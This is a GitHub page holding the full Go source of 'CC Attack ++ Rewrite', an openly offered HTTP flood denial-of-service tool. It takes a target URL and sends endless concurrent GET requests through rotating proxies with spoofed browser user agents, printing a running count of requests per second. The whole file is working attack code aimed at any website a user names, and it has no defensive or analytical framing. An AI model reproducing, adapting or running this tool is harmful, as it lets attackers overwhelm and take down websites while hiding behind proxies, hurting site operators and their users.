-
Notifications
You must be signed in to change notification settings - Fork 5
/
Copy pathCC-Attack-Rewrite-2.2.4.go
184 lines (149 loc) · 4.61 KB
/
CC-Attack-Rewrite-2.2.4.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
package main
import (
"bufio"
"flag"
"fmt"
"math/rand"
"net/http"
"net/url"
"os"
"strings"
"sync"
"time"
)
var version = "2.2.3 (BUILD 2024/4/19 9:00)"
func main() {
targetURL := flag.String("url", "", "Attack URL")
requestInterval := flag.Int("speed", 100, "Attack Speed(ms)")
timeout := flag.Int("timeout", 2500, "Request Timeout (ms)")
userAgentFile := flag.String("ua", "", "User-Agent Pool Path (txt)")
proxyListFile := flag.String("ip", "", "IP Pool Path (txt)")
threadCount := flag.Int("thread", 2, "thread")
flag.Parse()
if *targetURL == "" {
fmt.Println("\033[31mCC Attack ++ Rewrite \033[34mVersion:", version, "\033[0m")
fmt.Println("\033[32mAuthor: MasonDye\033[0m")
fmt.Println("\033[32mGitHub: https://github.com/MasonDye/CC-Attack-Rewrite\033[0m")
fmt.Println() // Add blank line
fmt.Println("\033[31mUsage:\033[0m")
flag.VisitAll(func(f *flag.Flag) {
fmt.Printf("\033[32m -%s\033[0m\n %s\n", f.Name, f.Usage)
})
return
}
var proxyList []string
if *proxyListFile != "" {
var err error
proxyList, err = readProxyList(*proxyListFile)
if err != nil {
fmt.Println("Failed to read IP Pool file:", err)
return
}
}
userAgent := "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
if *userAgentFile != "" {
userAgentList, err := readUserAgentList(*userAgentFile)
if err != nil {
fmt.Println("Failed to read User-Agent file:", err)
return
}
rand.Seed(time.Now().UnixNano())
userAgent = getRandomUserAgent(userAgentList)
}
successCount := 0
errorCount := 0 // Add error counter
startTime := time.Now()
var wg sync.WaitGroup // Add Wait Group
// Welcome and version
fmt.Println("\033[32mCC Attack ++ \033[31m|\033[34m Version:", version, "\033[0m")
// Print attack start
fmt.Println("\033[31mStart Attack!\033[0m")
proxyCount := len(proxyList) // Proxy Count
for i := 0; i < *threadCount; i++ {
wg.Add(1)
go func() {
defer wg.Done()
client := &http.Client{
Timeout: time.Duration(*timeout) * time.Millisecond,
}
for {
if proxyCount > 0 { // If proxy available
proxyURL := getRandomProxy(proxyList)
transport := &http.Transport{
Proxy: http.ProxyURL(proxyURL),
}
client.Transport = transport
}
req, err := http.NewRequest("GET", *targetURL, nil)
if err != nil {
fmt.Println("Request creation failed:", err)
continue
}
req.Header.Set("User-Agent", userAgent)
resp, err := client.Do(req)
if err != nil {
// fmt.Println("Request failed to send:", err)
errorCount++ // Increase error counter
continue
}
successCount++
elapsed := time.Since(startTime).Seconds()
requestsPerSecond := float64(successCount) / elapsed
// Print attack info
fmt.Printf("\r\033[31mRequested:%d \033[0m|\033[31m %.1f p/s \033[0m|\033[31m URL:%s \033[0m|\033[31m Thread:%d \033[0m|\033[31m Speed:%d \033[0m|\033[31m Timeout:%d \033[0m|\033[31m Error:%d \033[0m", successCount, requestsPerSecond, *targetURL, *threadCount, *requestInterval, *timeout, errorCount)
resp.Body.Close()
time.Sleep(time.Duration(*requestInterval) * time.Millisecond)
}
}()
}
wg.Wait() // Waiting for all co-programs to finish executing
}
func readProxyList(filename string) ([]string, error) {
file, err := os.Open(filename)
if err != nil {
return nil, err
}
defer file.Close()
var proxyList []string
scanner := bufio.NewScanner(file)
for scanner.Scan() {
proxy := strings.TrimSpace(scanner.Text())
proxyList = append(proxyList, proxy)
}
if err := scanner.Err(); err != nil {
return nil, err
}
return proxyList, nil
}
func readUserAgentList(filename string) ([]string, error) {
file, err := os.Open(filename)
if err != nil {
return nil, err
}
defer file.Close()
var userAgentList []string
scanner := bufio.NewScanner(file)
for scanner.Scan() {
userAgent := strings.TrimSpace(scanner.Text())
userAgentList = append(userAgentList, userAgent)
}
if err := scanner.Err(); err != nil {
return nil, err
}
return userAgentList, nil
}
func getRandomProxy(proxyList []string) *url.URL {
if len(proxyList) == 0 {
return nil
}
randIndex := rand.Intn(len(proxyList))
proxyURL, _ := url.Parse("http://" + proxyList[randIndex])
return proxyURL
}
func getRandomUserAgent(userAgentList []string) string {
if len(userAgentList) == 0 {
return ""
}
randIndex := rand.Intn(len(userAgentList))
return userAgentList[randIndex]
}